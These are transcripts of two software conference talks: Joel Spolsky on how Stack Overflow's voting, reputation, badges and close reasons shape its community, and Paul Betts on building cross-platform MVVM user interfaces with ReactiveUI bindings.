The other message, by the way, is that all the avatars are just sort of like little blobs. Nobody has bothered to upload a custom avatar, but that's a little more subtle. Meanwhile, we actually have two math sites, math overflow, which is for research level math and math stack exchange, which is for just general math, not research level. And again, the minute you go to that site, you realize that this is very advanced mathematics and I don't understand any of it. And there's all kinds of formulas, they're in equations and beautiful LaTeX formatting. But I can't make heads and tails out of it. Math overflow is so advanced. I don't know if this is so advanced. But the rule on math overflow is only research level mathematics are welcome, which means it's a commu-, the general rule is if you could ask one of these questions to a math professor at a university and they could answer it, then it's not research. And therefore, it doesn't belong on math overflow. And that's sort of their guidance. And that sort of shows you they're only asking questions that math professors can't answer. This is a pretty sophisticated site for a pretty narrow range of, you know, in that case, about 12,000 people that participate on something of a regular basis. And everything about the homepage sends you that signal, so you would not ask a question about, you know, how to subtract on those sites. So you see a group of people, you see a website, and it's going to have all kinds of little signals going on. And you're going to decide, you know, here's a group of kids and it's winter and they're wearing shorts, which means that this is an East Coast university and they're from California because they're still wearing shorts. And they're wearing these little caps that indicate that they're probably in a frat and they're playing Ultimate Frisbee. And there's a whole bunch of signals there and they're obviously athletes, not stud-, not studious, you know, they're jocks, not geeks. And as soon as you see that group of people doing that thing, you immediately decide, that looks fun, I want to join them. Or I don't even know what they're doing, I'm not going to join them. And everything about the homepage is designed, again, to push away the wrong people that can't answer questions for us and that are going to have questions that are going to interfere with sort of the professional stuff that's going on on Stack Overflow. So first impressions is the first thing I talked about. The second thing I want to talk about is voting, of course, and you're a programmer so I can go through this pretty quickly. Voting, you could vote on questions. They, there's a little up arrow and a down arrow. When you like a question, you vote it up. When you don't like it, you vote it down. The most interesting thing there is actually voting on answers and that is a fairly, fairly reliable way to make sure that the good answers appear first in the, in the, in the list instead of last. And that difference alone made a huge difference to sort of the quality of a page that Stack Overflow shows you. Because every other forum was showing you the historical archive of a discussion that took place, which you could read and that would take you a certain amount of time and the answer might be towards the end. It might be buried in the middle. It might not be anywhere and you had no way of judging other than careful reading and then trying everything. Which of those answers was likely to solve your problem? 
But by sorting things, by vote, by community peer, it's, it's very, very likely that the first answer or maybe the second but most likely the first answer is the actual solution to the problem. And so if you find a Stack Overflow question as a result of a Google search, which is over 90% of the people are doing that, then over 90% of the page views are results of Google searches, then the, the first thing you read is likely to be the answer. So you're likely to be happy that you got your answer right away. Instead of having to read a seven-page discussion and click next and try all the things that the different people recommended and see if they work for you, you can skip that, that whole stage. One of the more valuable parts of the voting is that it leads to reputation. And every society has some kind of reputation system. The, you know, the military always has this thing that we call fruit salad that you wear, you know, all these colorful little ribbons to indicate, it's Colin Powell. A complete history, those are called campaign ribbons. So it's a history of things that you've done. And everything else is our sort of badges that you've earned. But these are things that you've done, you know, battles that you've been in and so forth. And of course we have the same thing on Stack Overflow. So here's our user page. And each user, mostly when we show you their, their name, we'll put it next to an avatar that they choose and then sort of a few more things like their reputation and so forth. So when you start out, it's very simple. You get a little tag there, a little slug. It has nothing other than your name on it and a one which indicates that you were able to successfully type your name. You get one free reputation point just to, just so you don't feel like you should recreate your account, I guess. And then you have a little picture which you control and if you haven't learned yet how to change your avatar, then we give you a bunch of little triangles which make you look like a newbie. Over time though, it starts to get a little bit better. You might get a little bit of reputation. You figure out how to upload a new picture of yourself that reflects you and you start to earn these little badges which appear next to your name. Over time, when you get a lot of badges, this is something not a lot of people have noticed, but I think 10,000, you get a little drop shadow that appears beneath your avatar and if somebody mouses over, you get this much larger card which appears which you control where you can put a description of yourself and so forth. You know, some of our top users have an awful lot of reputation. There's John Skeet, still our number one user. And the only thing that you can sort of go beyond just having a lot of reputation on the system is you can run an election to become a moderator. And when you're a moderator, you get that little diamond next to your name which means that there was an election and everybody voted and you won and you became one of the moderators on the site which gives you the ability to sort of remove things without anybody questioning what you're doing to see things that have been removed and to try to help the community run itself by itself. So all of this stuff, all of this flair is stuff that you wear if it's your clothing when you're on Stack Exchange. And it sends a message as to who you are and what you care about and what you like and why people should pay attention to you and whether or not they should pay attention to you. 
And it's going to, even if it has no effect on the people that are seeing it, it has an effect on you because you're always thinking about what is the message that I'm portraying, that I'm conveying, that I'm sending people. And it's something that sort of everybody thinks about just in the way they get dressed every morning and what they put on and how they wear it. And I picked this picture of a person because he's got about 30 things going on there in which he's trying to portray something about himself to everybody that sees him. When he wakes up in the morning, he thinks about how he's wearing that little hat that, flag, if you don't recognize it, is the Confederate States of the United States. They tried to break off in the Civil War because they wanted to keep slaves and they were defeated in the Civil War but he still got the flag. And it's on a particular kind of truck or hat. He's got a particular kind of haircut. He's got all kinds of tattoos which I won't even begin to start to interpret the tattoos. Can't see them all that well. Anyway, he's got a cute little flip phone. He's got the Harley Davidson motorcycle bike belt buckle. And that shirt that he's wearing is what we call in American a wife beater. And not only is he wearing a wife beater t-shirt but he has an emergency backup wife beater t-shirt in case something happens to the first one. Stuck in his belt. So again, it's just he's sending 27 signals as to who he is and what he wants you to think about him and how he wants to present himself. And that's something that everybody does and you can be a peasant or a king and you still get to think about what you wear, how you present to the world. And that's what reputation is. We have badges as well which is sort of a part of your reputation on Stack Overflow. And one thing that people don't recognize about badges is that people sort of look at them and say, well, I don't really care about badges. I'm just answering questions and I'll earn those accidentally. And most people actually don't. But just knowing that the badges are there is enough to send signals to the community, to the world of people on Stack Overflow as to what behaviors we want you to do. So for example, when Jeff Atwood and I designed Stack Overflow, we said, should you be allowed to answer your own question? And we thought about this and we said, well, there's pros and cons. If you can answer your own question, then your stealing reputation from other people that might have come along later and answered it and gotten their reputation sort of seems unfair for you to ask a question and then immediately answer it and get reputation. On the other hand, we realized that the person most likely to be able to solve a problem is the person who asked it because once they ask the question, you know, they don't give up or go to sleep or take a nap. They actually go back to their compiler and continue to try to solve that problem. And so they're very likely to discover the answer and if they do, we want to encourage them to post it for everybody else to see. And indeed, the goal of Stack Overflow is to make answers for those hundreds of people that are coming into each question from Google searches to read. It's not necessarily to solve the problem of the original asker. And so we decided that we definitely want to allow you to answer your own question. In fact, we want to encourage it. And so there's a badge that you can earn for answering your own question. 
And that is enough to send a message to the entire community even if nobody works hard to try to earn that badge. And some people do. But even if they don't, we've told the entire community, look, this is a site that values, this community values you when you answer your own question. Plus about another hundred odd things that we can show you through the badge system that we consider to be important. All these things, these badges, these reputation, they are a part of your permanent record and they feed into the fact that you can get a job on Stack Overflow and that we have this career system in the background where you can sort of advertise what you know and what you're good at. And thousands of employers will have access to that and be able to come along and find you based on your skills. Government is something that every society has. Every society of two or more people has some system of governance. We built some of the government system into Stack Overflow from the beginning. The most important thing that we built in is the reputation system is we realized that as people gain more experience with Stack Overflow, as they spend more time using Stack Overflow, they'll earn more reputation and they can be trusted to make more and more decisions within the system. So they can be trusted more and more to indicate to us what should be closed, what kind of questions should be closed, to vote things up, to vote things down. As you earn reputation, we realize that you're spending more time on our site and we could show you less advertising because you've already seen that same ad 50 times. We can show it to you fewer. And in fact, almost all of the daily community moderation is sort of done by people that have just earned enough moderation to do it, earned enough reputation to do that moderation. We have another site which a lot of people don't know about called Metastack Overflow. It's the site about Stack Overflow and that's where conversations take place about what's going on on the site. Why was this question closed? Should we allow questions like this? Should we have a feature that does so and so? This is sort of the equivalent of the parliament or the Congress of Stack Overflow or maybe it's sort of like a town hall where conversations take place. And we have a chat system which almost nobody has found yet, but it's there. Keep digging. You'll find it. There's a link. And this is 24-7 online sort of IRC style chat where sort of more immediate decisions are taken. There's one room, one chat room that we give all the moderators access to. There are about 300 moderators on Stack Exchange and they have access to a room called Teacher's Lounge. And Teacher's Lounge is almost like real-time police radio where literally in real-time people are responding to the needs of the community. We have a blog which is sort of like a newspaper and all of these things are sort of parts of our culture, parts of our society. The blog is where we sort of announce things, big news, big changes, et cetera. We'll show up on the blog. And all of that society, all of those governmental institutions, whether it's the real-time ones like Teacher's Lounge or mostly the ones like Metta, the chat and a very limited number of internal conversations that we have, lead to law, creating a system of law. And every successful society eventually has a bunch of laws. Our primary overruling law is We Hate Fun. This is the symbol of the logo of We Hate Fun as a clown throwing up. 
And essentially, we take ourselves way too seriously. When we first created Stack Overflow, we detected that people were every once in a while asking something that was funny or somebody would write a response that was very funny. And the thing that would happen is somebody would write something funny and everybody would look at it and they would vote it out because it was funny. And that was already interfering, immediately interfering with this system that we tried to build, which is a system that gets you the correct answer to your question. And then these things that were funny and that got upvotes would attract eyeballs from all over the place. So they get posted to Reddit and Hacker News and Slash. If you go back far enough in time. And millions of eyeballs would land on these things. And we could tell because we would see these pages that instead of having 200 page views or 500 page views, would have 50,000 page views. Now a normal website developer would say, yay, I win because they're getting all the page views. But these pages were completely useless. They were bad answers. And if you were searching for a particular question or searching to solve a programming problem, which is what we built our site for, then these pages would get in your way. Thus, our rule about hating fun and the way that we show that we hate fun is that we close questions all the time. And we close questions that for various reasons, possibly because they're fun, but more likely just because they just don't fit on our site for various reasons. And we have about five of them. And those are sort of the laws. That's kind of how we enforce things. We have, when we close things, by the way, we don't immediately delete them. If we just deleted them, then you wouldn't know we closed them. And you might continue to practice that bad behavior. So what we do is we sort of close them and we leave them around on the homepage for a while with the word closed next to it and a big banner over it saying, this question is bad. The person who asked it is evil and should be, doesn't really say that. But we leave that out sort of as a signal to everybody else, don't do this. This is not what we do here. Please stop doing this. Somebody did this. And we had to close their question. And then we're not allowing anybody to answer it because you did this thing. The five things that we did that we have as closed reasons that are constantly evolving, constantly changing, and sort of with, as we learn from the community, we change what those things are that we close and why we close them. One of the reasons, these are the current reasons, but they're in the process of being changed. One of them is a duplicate. We used to refer to this as a duplicate question. Now we don't really think of it so much as this is a duplicate question. We think of it as this question has already been answered, just slightly different by about 5%. If somebody tells you, if you ask a question and somebody tells you, somebody already asked that question, then you say, good. Well, that's probably because this is a good question. It's like, what's wrong with that? If you ask a question and we tell you, oh, by the way, somebody already answered that question, then you say, oh, terrific. I'll just go read that answer. I can undo my asking over here. So duplicates, the reason we close duplicates instead of letting you ask them all over the time is again and again and again is that we are in some ways a wiki because our answers are editable. 
And we would rather have one amazing answer to each question rather than having that a lot of people edit and maintain and modify and keep up to date rather than having a bunch of people answering the questions again and again and again, especially for common things like what is a monad? We have a reason for closing questions called off topic. Obviously people will come in and ask things that are completely unrelated to the topic of programming. This one was a toilet issue. This is not strictly a programming problem. I have a lady employee who is joining from tomorrow and I want to convey her a message that the bathroom facilities at the office are out of order. How do I tell her to relieve herself before arriving in the morning? So that's not really a programming question. And we just closed it. And it was obviously fortunately that I see here that was only viewed 48 times. So it didn't cause a lot of damage. Wow. Out of the 48 people that viewed that, 22 people voted it down. That's pretty bad. We have something that we call not constructive. The word not constructive itself is not constructive in the sense that nobody understands what it means or why we're closing your question is not constructive. What it really means is that we have discovered that questions that are highly opinion-based don't work well on Stack Overflow because they tend to generate, if it's highly opinion-based, it tends to generate conversation on both sides of the issue that doesn't really go anywhere and it sort of inquite and it doesn't teach anybody anything. It's just like how many debate points can you think of to say that VI is better than Emax or Cabs are better than Spaces or Web Forms are better to use than NBC Developer. And some of these things actually do have a lot of pros and cons. There are a lot of reasons to use Cabs and a lot of reasons to use Spaces. But the actual debate of that issue is something that generates a page on the Internet that first of all already exists in a million forms and secondly is a complete waste of time. And it's amusing for the participants but it doesn't create an artifact that's going to be useful for things going on later. So anything that's highly opinionated or highly based on subjective criteria we tend to close on Stack Overflow. We also have a thing called Not a Real Question. That's a little bizarre. This question was need ideas about mobile apps which have never been created before. So it's like, okay, for whatever reason we've just decided that this is sort of not a real thing. Now this particular closed reason is insulting saying, hey, that's not a real question. Like, yes it is. It has a question mark. And a lot of times it's not a real question because you bungled the explanation of your question. And we're going to change sort of the wording of this. This is really off topic. It's really just not a programming question. It's not within the scope of the kind of questions that the site was built for that we want to ask. We have something called too localized. Again, a confusing term because, but this is I'm missing a bracket somewhere. Here's my code. Where's the missing bracket? Unlikely to help anybody else. You know, one of the key observations of Stack Overflow is that every, for every question, it's asked by one person. It's answered by on average two people. Sometimes four, sometimes one. That's a lot more than that. But, you know, a few people answer it. But it is viewed by hundreds. Usually people coming in from Google who have landed there. 
And so we actually feel like the real community that we're trying to serve, the number one community we're trying to serve with Stack Overflow is the 99% of people who land on a question because they were searching for a problem. Not because they typed the question themselves or the even smaller group of people that typed answers who we love. But the people that we really want to serve are the 20 million people a month who land on our site because of the search engine query because they're having this problem and we already have the answer for them. And so when somebody asks a question that is unlikely to ever help anybody else, it's sort of a bad thing to be stuffing in Google search results because anybody that ever goes to this page is going to be sad for the rest of all time. And so the principle of two localized says, you know what? Your question is bad because it's selfish and it's unlikely to help anybody else. And that doesn't mean that you can't ask it. It just means that we're going to look at it kind of askew. And what's interesting about these two localized questions is that in almost every case, they can be cured in about 10 seconds and made much more applicable. So instead of asking, where is the bracket that I'm missing? Where is my close friend that I somehow forgot somewhere? You should ask, I have a bunch of code that looks like this, five lines of sample code. What is the best way to find a missing bracket? What debugging technique would you recommend so that I may find a missing bracket? And now you've taken something which is your personal problem and you've made it globally applicable to a large range of people and now all of a sudden it belongs on Stack Overflow. So two localized is sort of what we do as a society to punish people that are being selfish. Or asking a question that nobody's ever going to be able to answer because, you know, it only applies for a vanishingly small amount of time. So in conclusion, you know, Stack Overflow is like a big city. Stack Exchange is like a giant city. Stack Overflow, when it has about 20 million people visiting a month, that's the population of Seoul, South Korea, one of the biggest cities in the world. It's like a big city. And if you imagine Seoul, South Korea, you imagine everybody speaks the same language mostly. Some of them are fluent, some of them are new. Some of them are babies, some of them are children, some of them are new speakers, some of them are just learning the language. But mostly there's just one language and yet there are a lot of, there's a lot of mainstream culture, there's a lot of subcultures, but there are 20 million unique stories of the 20 million individuals that live there and that's where it really, really gets interesting. And so the techniques that you would think of to try to study a city are the same techniques that we use to study and to build and to design the Stack Exchange network. Again, the old days, computers were just a computational device and I think I sort of challenge you as you go through the next couple of days when you're in a session and somebody is giving you an example of object-oriented design in C-Sharp. And you think about sort of what are those design decisions that you're making merely to do a calculation or a computation. 
And then think about the fact that if you're building modern software, it's very likely that you're creating software for culture, for a culture and for humanity and for a large group of people and that your software and your C++ classes at some point possibly going to mediate between human beings and at the point that it mediates between human beings, it creates culture, creates society and you have to think about it like an anthropologist essentially. Thank you very much. Thank you.
|
Joel Spolsky is an expert on software development, co–founder of Fog Creek Software, and the co–creator of stackoverflow.com. His website Joel on Software is popular with software developers around the world and has been translated into over thirty languages. He has written four books about software development, including Smart and Gets Things Done: Joel Spolsky's Concise Guide to Finding the Best Technical Talent (Apress 2007). Joel has worked at Microsoft, where he designed VBA as a member of the Excel team, and at Juno Online Services, developing an Internet client used by millions.
|
10.5446/51486 (DOI)
|
Great. So this is not about domain-driven design CQRS. So this was originally talked by Ashik Mahjtab's, but he couldn't make it. So I'm subbing in and I'm talking about something completely different. So if you were interested in DDD, then you should find a different talk. But if you were interested in making user interfaces on places that aren't traditional Microsoft platforms, then you should stick around. It'll be interesting. You know, just stick around always. Like it'll be fine. I promise it'll be interesting, or at least entertaining. I can't promise it'll be interesting. It's fine. You know, I'd have to read people's brains. It'd be weird and awkward. Just like this introduction. So this is MBVM without XAML. So alternate title is a login dialog, is a login dialog, is a login dialog. Alternate title, how to write the same code and have it run everywhere. So Apple, Android, Windows Phone, WinRT, Metro, Windows Store, Modern, whatever Microsoft calls it these days. I can't even keep track. So who am I? My name is Paul Betts. I'm giving a talk on GitHub tomorrow on pull requests on, and that's what I originally came here for. But I'm giving this other talk as well, and I'm really excited about it because I really like this talk. I think it's super interesting. So I work at GitHub. I work on GitHub for Windows, which is a desktop application that makes it easy to use Git, especially with GitHub. But you can actually use it with Codeplex and Bitbucket and anywhere you want. It's just a Git client. So let me get back to the topic of this presentation. As you can see, these three dialogues look very different. So on the left, there's like Android, old.sad, and in the middle we have an iPhone, login dialog. On the right, we have this Windows 8 login dialog. So they look pretty different. They're set up different, they're arranged differently, but the thing is they mostly act the same. So even though those login dialogues look different, they share a lot of things that are really similar. You'll find a lot of dialogues or a lot of pages in an application will act pretty similar even though they're on different platforms. So let me give you a few examples. So the user can't click login until the username password is filled out. You need to do login with the credentials and pop an error if it doesn't, they don't work. If you don't show the user that we're trying to go over the network and look up the login information, they think that something wrong happened, they start pounding on buttons. So you have to show the working span. Once it succeeds, we have to go to a different page. That page is probably the opening page of the application. So these things are true in everywhere, in all these different platforms. And so we should be able to share that code everywhere. It would be really cool. But right now we can't. Right now it's really frustrating to try to share code directly on between these different platforms. So when I say sharing code everywhere, this is not what I mean. So Swing is the Java toolkit. If you use the clips, this is what Swing looks like. GTK and Qt are both cross-platform UI toolkits. It's a way to write the same UI and have them show up everywhere. That's useful, but I think that it's not, if you want to make great, especially mobile applications, this is an early good approach in my opinion. You end up having these applications that don't feel native. And so we don't want to do that. We want to have native applications that feel like they're on their platform. 
But at the same time, I don't want to write every application three or four times. So how can we solve this? We can solve this via a pattern called MVVM. MVVM is super popular in the Microsoft world, and in the Cocoa and Android world people are starting to realize why it could be useful. How many people have heard of MVVM? Probably a lot of people — it's a .NET conference. How many people can correctly describe what a view model is? Don't answer that, because I'll get fifty different answers. It's a very confusing term. The best way people describe it is that it really is a model of a view. And there are a few important things about why we should even bother with this pattern, or why it's interesting. I like to summarize it this way: we use MVVM because UI frameworks are untestable, because they're written by Apple and Microsoft and they live in the late 90s, so they don't care about unit tests. That's a joke — you can laugh, you're allowed; I'm just poking a little fun. The important thing is that view models separate mechanism from policy. What do I mean by that? View models describe what can happen. I have two different kinds of things: I have properties, like first name and last name, on my view model, and those can be set and read. And I also have commands — commands are things like copy, paste, open. When we separate mechanism from policy, what we're trying to do is make it so that it doesn't matter how a command was invoked; it only matters that the command was invoked. So if I have an open command, it might be in a toolbar button and in a menu — I don't care. When I write applications in the traditional way, I've permanently tied how a command is invoked to what actually happens when you invoke it. When I write menu.OnClick and attach some code, I've tied the invocation of the command — the actual stuff it does — to a UI toolkit element, which is really problematic because I can't test UI toolkit components easily. If I try to create a WPF window in a unit test runner, I won't have a dispatcher, and all kinds of things will go weird. Trying to simulate typing into a text box is kind of weird, and that's not really what I'm interested in testing anyway. I'm only interested in testing: when I change this thing, what happens? So testability is really important here. A lot of people — especially when I introduced this to my friends on the Mac team — said, you can't test that code, this is untestable code. They actually originally said, we don't have any code to test. I said, but you've got all this code, it's a huge application. They said, well, it's all UI code, you can't test that. You can, if you do the separation, which is really interesting. So the cool thing is we can actually create most of the interesting parts of our application without actually seeing the user interface, and then when we wire it up, we want the code in the view to be really, really super boring — because I can't test anything in the view. So I'm going to make that code really mechanical and super boring, so that when I look at it, it's obviously going to be right, because there's nothing interesting in it. That's the idea: move all the interesting code into a class we can test, because view models are just regular classes, and then put as little code as possible in the view, where we can't test it.
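As a rough sketch of what such a testable login view model might look like — written with current C# syntax, framework-neutral, and with made-up names (`LoginViewModel`, `ILoginService`); the "command" is shown as a plain method plus a `CanLogIn` flag rather than any particular framework's command type:

```csharp
using System.ComponentModel;
using System.Runtime.CompilerServices;
using System.Threading.Tasks;

// Illustrative only: a view model that can be unit tested with no UI toolkit loaded.
public class LoginViewModel : INotifyPropertyChanged
{
    string userName, password;
    bool isBusy;

    public string UserName { get => userName; set => Set(ref userName, value); }
    public string Password { get => password; set => Set(ref password, value); }
    public bool   IsBusy   { get => isBusy;   set => Set(ref isBusy, value); }

    // Mechanism vs policy: the view decides *how* login gets invoked,
    // the view model only decides *what* happens and *when* it is allowed.
    // (A real implementation would also raise change notification for this.)
    public bool CanLogIn => !string.IsNullOrEmpty(UserName)
                         && !string.IsNullOrEmpty(Password)
                         && !IsBusy;

    public async Task<bool> LogInAsync(ILoginService service)
    {
        IsBusy = true;
        try     { return await service.LogIn(UserName, Password); }
        finally { IsBusy = false; }
    }

    public event PropertyChangedEventHandler PropertyChanged;
    void Set<T>(ref T field, T value, [CallerMemberName] string name = null)
    {
        field = value;
        PropertyChanged?.Invoke(this, new PropertyChangedEventArgs(name));
    }
}

public interface ILoginService
{
    Task<bool> LogIn(string userName, string password);
}
```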
So we're doing MVVM right if we can write a UI without actually seeing a UI, right? Which is really cool. So if view models don't know about views, then why can't we use them everywhere? Like there's a piece missing if I want to take my, you know, WinRT view model and then run it on Android. Does anyone know that piece? What about bindings? Right? So a huge part of MVVM is being able to tie the view and the view model together through these XAML bindings, right? And so most people in here have used MVVM, have used XAML bindings, right? Like, has anyone not used XAML bindings? No one, not know what I'm talking about? No? Cool. So we have a solution to this problem. Actually we have several solutions to the problem. I see Stuart Lodge in the audience. He also solved this and did a great job. It's very cool. So ReactiveUI. So everyone and their brother has written an MVVM framework, myself included. And so mine is a little interesting because it includes this library called the Reactive Extensions. And so the Reactive Extensions, I'm going to try to explain an hour's worth of content in two minutes. So imagine, you know, we have a list, right? We have like one, two, three, four, five and we can run Select and Where and Aggregate and SelectMany on it and then get a more interesting list, right? And so if you look at an event like key up, somebody types on the keyboard, you see H-E-L-L-O. It's like, well, that was kind of a list, too, right? Like it was some stuff in a particular order, right? And so if I can take a boring list and run Selects and Wheres and Aggregates and SelectManys on it and turn it into an interesting list that I care about, why can't I take boring events like mouse up and mouse down and turn them into interesting events like the user dropped a file on the right hand corner, right? So the Reactive Extensions take all the things you know about lists and apply them to events. And you find out that events are everywhere, but we always refer to them with different language: a callback is an event that only happens once, right? But it isn't treated like an event, you pass it, you know, like a callback method, right? Or like, you know, geolocation is an event, right? Like we're getting location information about where we are, but we don't treat it like an event because it has different syntax, right? So being able to combine those and talk about them with the same language and be able to use these really functional programming concepts on them is really interesting. So anyway, you don't need to know that. The point is that ReactiveUI has its own binding framework, completely rewritten; it doesn't use the XAML bindings at all. So here's an example. So we're going to take the view model and we're going to take the username property and bind it to a text box on the view, right? And so by default, when I say bind, it's a two-way bind, right? So if I type in the text box, it ends up in the view model. If I set the view model, it ends up in the text box. So that's pretty interesting. Let's take it a little bit to the next level, right? So this is a one-way bind. It only goes from view model to view, right? But what it does, it will do things like you can register ways to convert between types. So like for example, in WPF, you don't use Booleans to say whether something is visible or not. You use an enum type called Visibility, right?
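For reference, the Bind and OneWayBind calls he is describing look roughly like this in a ReactiveUI view's code-behind. This is a sketch assuming a WPF project with ReactiveUI referenced and XAML defining controls named UserNameTextBox and ErrorLabel; the view model type and property names are invented, and the exact extension-method signatures can differ slightly between ReactiveUI versions.

using System.Windows;
using ReactiveUI;

public partial class LoginView : Window, IViewFor<LoginViewModel>
{
    public LoginView()
    {
        InitializeComponent();
        ViewModel = new LoginViewModel();

        // Two-way: typing in the TextBox updates the view model, and setting the
        // view model property updates the TextBox.
        this.Bind(ViewModel, vm => vm.UserName, v => v.UserNameTextBox.Text);

        // One-way: flows only from view model to view; registered converters can
        // translate types (for example bool to Visibility) along the way.
        this.OneWayBind(ViewModel, vm => vm.ErrorMessage, v => v.ErrorLabel.Content);
    }

    public LoginViewModel ViewModel { get; set; }
    object IViewFor.ViewModel
    {
        get { return ViewModel; }
        set { ViewModel = (LoginViewModel)value; }
    }
}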
So for conversions like that, ReactiveUI registers a bunch of default ones. There's a bunch of custom ones as well that you can create that let you say every time I bind a Boolean and the target property is Visibility, just convert it for me. I don't want to think about it, right? So we can also bind commands, right? So we will take the do-login command and bind it to the login button. And so we can use the same kind of plug-ins to describe how to bind to different types. So if I recognize that a type has a Command and a CommandParameter property, I can bind to that. Or if I don't know how to bind to it, maybe I'll look for a Clicked event. That seems reasonable, right? Or like if I'm on iOS, I use touch up inside, right? Or, you know, you can register, you can teach ReactiveUI how to do things for your particular UI framework. And we'll see an example of this in the demo. So that seems like exactly what XAML bindings do. That's not very compelling. Let's do a little bit more interesting one. So because a binding, at least a one-way binding, is really kind of the same as an IObservable pipeline, like a LINQ query, right? We can take the source and the target and split them up and then do really interesting things in between them, right? So I've used this method called WhenAny. So I put in, you know, dot SearchText, the property I'm interested in, right? And it tells me whenever that property changes, right? So whenever search text changes, tell me about it. So I say, you know, WhenAny of the search text, and I want the value of the search text, right? The other options are sender and property name. That's not so exciting. Value is really the only interesting one. So where it's not null, I don't really care if it's null, like don't even tell me about it, right? And so we use this method, SelectMany, because we're going to take, we have a sequence and we're going to take Google search, which also returns a sequence. I didn't show that in the list. And then flatten that sequence, because it's SelectMany. If that doesn't make any sense, don't worry about it. But the moral of the story is that I can use bindings but add asynchronous things in the middle, right? Or really interesting things. Now that's a terrible idea because I'm doing non-trivial work in the view. I shouldn't do that. But you can. So, you know, you've been given a sharp set of knives. Use them appropriately and don't chop off your own arms. So I've said that ReactiveUI can be used in all kinds of different places. Let's kind of prove it, right? So why not an MVVM WinForms app? Let's bring the late 90s back. So I'm going to reset to the earlier version of this so I don't spoil the surprise. Actually, it's not a surprise, it's nothing. You can see me do live Git. Cool. So for a different presentation at QCon that I presented along with Erik Meijer, I wrote this WPF application, right? So let me show you what it does before I set a start project. There we go. So what it does is a color picker, right? There should be something on the screen because I didn't switch back to me. There we go. So one of the things that ReactiveUI introduces is this concept of, I call them either output properties or derived properties. So in this view model, we have, we'll show it to you. Yes, that's cool. A red, green, and a blue property, right? It's a view model of a color picker. That makes sense. You can set or get them.
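The WhenAny pipeline he describes for the search box would look something like the following inside a view model constructor. Treat it as a sketch: SearchText, SearchResults and searchService are invented names, searchService.Search is assumed to return an IObservable of results, and RxApp.MainThreadScheduler assumes a ReactiveUI 5-era API.

// Inside the view model's constructor (requires ReactiveUI and the Rx packages):
this.WhenAny(x => x.SearchText, x => x.Value)            // fires whenever SearchText changes
    .Where(text => !string.IsNullOrWhiteSpace(text))     // ignore empty/null input
    .SelectMany(text => searchService.Search(text))      // asynchronous search, flattened like SelectMany on a list
    .ObserveOn(RxApp.MainThreadScheduler)                // results land back on the UI thread
    .Subscribe(results => SearchResults = results);

As he says, doing this kind of work in the view would be a bad idea; in a view model it is just another testable pipeline.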
But this final color property isn't really something you should set, right? It's really a derived calculation of red, green, and blue, right? And so we'll see how we do that in ReactiveUI. But the point is that we can describe how properties are related in the constructor. And here, you can see. So I've done a little trick. The cool part of this presentation that I spoiled earlier is that there's a service called TinEye. And one of the things they let you do is you provide it a color and it will give you a bunch of images that are kind of that primary color, right? And so I've taken the final color and then selected it into a list of images and then selected that into a loaded set of images. So let's see the code. So this is ReactiveUI working in WPF. And so, this is some of the syntax, right? So we can say like, WhenAny of red, green, or blue, select it into a tuple, right? We want to take those ints and select them into a color, right? But sometimes that tuple is invalid, right? So if I type like 3 million into the text box, that's not a valid color. So ints-to-color returns null, right? So we're going to say where X isn't null, select it into a brush and then set it to the final color. And we've got this one command, OK. And the OK command grays out when the color is invalid. So now I can't hit OK, right? So the cool thing is I was able to unit test that, right? So when I write a unit test, it's going to look something like this. Like I'm going to try to set it to 255. I'll see that the color is 255. I'll try to set blue to 300, a garbage value, right? And so if I describe my entire UI in terms of these kind of tests, then I have like all of the logic of a UI but without actually having to design anything, like actually put together a UI. And it'd be testable, right? Like I could run these tests and make sure that they still happen. So I can say like, you know, if you spec out a UI and write this kind of design, you'd say these kinds of statements, like we should change a color when the values change, right? And I can make sure that those happen in a unit test. So that's really cool. So anyway. So you notice, if you know this icon, this is the link icon, right? It means that this file is linked from the WPF project. It's the exact same file. So I've got my Windows form. It's pretty cool. I hadn't done this in a long time. It took me a long time to figure out like how do I use the WinForms designer again? So let's see the code. So I'm going to set the view model to a main window view model. I'm going to create a new one. And I'm going to use these bind calls, right? And so I'm going to bind these different commands. And because it's WinForms and ReactiveUI doesn't technically support WinForms, I had to add a few things, right? And so to do that, I registered things. So ReactiveUI has its own IoC container, just like MVVM Light does as well. And so I had to register how to convert from a WPF color to a WinForms color, for example, or how to bind to WinForms buttons, right? And so, yeah, and I think that's the whole thing. So let's hit go and see if it works. So I was far too lazy to try to do image loading inside WinForms. That's just too hard. Like, I've forgotten all of my Win32 knowledge. It just doesn't work. So the cool thing is this code is super boring, right? And it's basically the same as if I go into the WPF version, right? So it's really similar code. The only reason it's different is because it actually works a little different.
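Here is a rough reconstruction of the view model shape being described, using ReactiveUI's output-property helper. It is a sketch only: the names are invented, the final colour is a hex string rather than a Brush to keep it platform-neutral, and the RaiseAndSetIfChanged, ToProperty and ReactiveCommand syntax assumes a ReactiveUI 5-era API (command construction in particular differs between versions).

using System;
using System.Reactive.Linq;
using ReactiveUI;

public class ColorPickerViewModel : ReactiveObject
{
    int red, green, blue;
    public int Red   { get { return red; }   set { this.RaiseAndSetIfChanged(ref red, value); } }
    public int Green { get { return green; } set { this.RaiseAndSetIfChanged(ref green, value); } }
    public int Blue  { get { return blue; }  set { this.RaiseAndSetIfChanged(ref blue, value); } }

    // An "output" (derived) property: read-only, recalculated from Red/Green/Blue.
    readonly ObservableAsPropertyHelper<string> finalColor;
    public string FinalColor { get { return finalColor.Value; } }

    // The OK command is only enabled while the colour is valid.
    public ReactiveCommand Ok { get; private set; }

    public ColorPickerViewModel()
    {
        var colorChanged = this.WhenAny(x => x.Red, x => x.Green, x => x.Blue,
            (r, g, b) => Tuple.Create(r.Value, g.Value, b.Value));

        colorChanged
            .Where(IsValidRgb)
            .Select(t => string.Format("#{0:X2}{1:X2}{2:X2}", t.Item1, t.Item2, t.Item3))
            .ToProperty(this, x => x.FinalColor, out finalColor);

        Ok = new ReactiveCommand(colorChanged.Select(IsValidRgb));
    }

    static bool IsValidRgb(Tuple<int, int, int> t)
    {
        return t.Item1 >= 0 && t.Item1 <= 255
            && t.Item2 >= 0 && t.Item2 <= 255
            && t.Item3 >= 0 && t.Item3 <= 255;
    }
}

A unit test can new up this class, set Red, Green and Blue, and assert on FinalColor and whether Ok can execute, without any window in sight, which is exactly the kind of test described above.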
